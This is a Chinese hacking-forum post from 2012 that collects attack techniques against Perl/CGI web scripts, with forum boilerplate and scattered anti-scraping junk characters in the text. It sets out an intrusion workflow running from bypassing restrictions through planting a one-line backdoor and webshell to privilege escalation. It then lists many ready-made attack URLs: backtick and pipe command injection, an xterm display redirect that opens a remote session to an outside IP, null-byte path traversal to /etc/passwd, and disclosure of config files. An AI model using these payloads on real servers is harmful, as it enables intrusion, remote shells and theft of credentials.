找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2996|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  * z/ \3 _- M; l- u+ h9 F
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  8 m) t1 m; c& O' k9 i
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  ( X( w* h; l. R! u" j+ w
注“  ! \& f5 w+ ]3 @: `
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
0 _, o5 ?' a1 r' K& d0 O以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
' y' B2 ]& K! i4 o3 U1 Q. z  C
, m, b. |1 i) Phttp://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
- c* }: u* i' l. \' N/ W& mhttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
8 A+ \2 }, R- D* l9 K) phttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
0 b! ~& P0 E  S- [6 Rhttp://target.com/cgi-bin/home/news/sub.pl?`id`  
6 y0 @$ d- m4 H6 ~% X! G  B! Whttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  / B4 }5 x- H! S& P4 b
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  ( E. O0 l, H% `/ i

0 v0 m' M. d0 Ghttp://target.com/test.pl;ls|  1 N7 ]* U# B3 n) Z
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
1 P' g. r! a7 ?; J5 ]5 ~$ `0 @http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
4 I+ h" K1 T! L, w2 \0 Vhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  ' M  a1 W4 e' u, s9 b; e( v
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  + I1 E9 |/ K! D: C! F% j7 P
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  + d) f3 R2 o" Y' s; c2 r. u  Q

4 |9 t5 K' V* T+ _4 v7 m3 mhttp://target.com/test.pl?&........ /../../etc/passwd  
8 f. o; K3 y! Q/ @' V0 N9 }) W! d0 A1 T/ J9 P- ~  W( ]
http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  4 F3 |0 M  Y4 }
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  * |3 z8 S. T1 u( m' n4 |
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  
  @4 O; c1 k/ }' j; Y3 w5 G" p" ~" q* w# C
http://www.target.org/show.php?f ... /include/config.php 查看php代码  ! p# t4 G" l/ P2 x2 Q* ~0 R
http://www.target.org/show.php?f ... ng/admin/global.php  6 z) ], a! X6 }8 C

0 I) P) ~+ y, m& Wemm和ps的一句话
1 \4 ~9 U' X2 E/ {0 }$ p- }  ~' D7 r# s5 U
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  
5 V5 f3 L7 D* I* f0 d4 H. S& p6 b8 l  k" d5 k" h+ K9 Z7 y8 i) k
>bbb%20|  ! R! F5 O4 O/ B3 x7 `7 y+ I
* x" Q/ v' E; f/ q5 d
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  % m0 m/ o) Q* J3 J( q
" G8 p5 ?! G/ `
http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  
% V, K5 b  y" K5 K. thttp://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  ( A0 k1 u$ l. ~8 Q1 R. a3 ]% n$ l

9 L5 n) X" h, r相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  0 l4 d# E. y  S' m2 _5 |0 e! T' H
http://target.com/index.html#cmd.exe  
. V8 P# ?1 j6 F0 M) o' Jhttp://target.com/index.html?dummyparam=xp_cmdshell  
$ a/ k7 y- Q. S* ilynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  3 E3 m& F/ O# G# d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表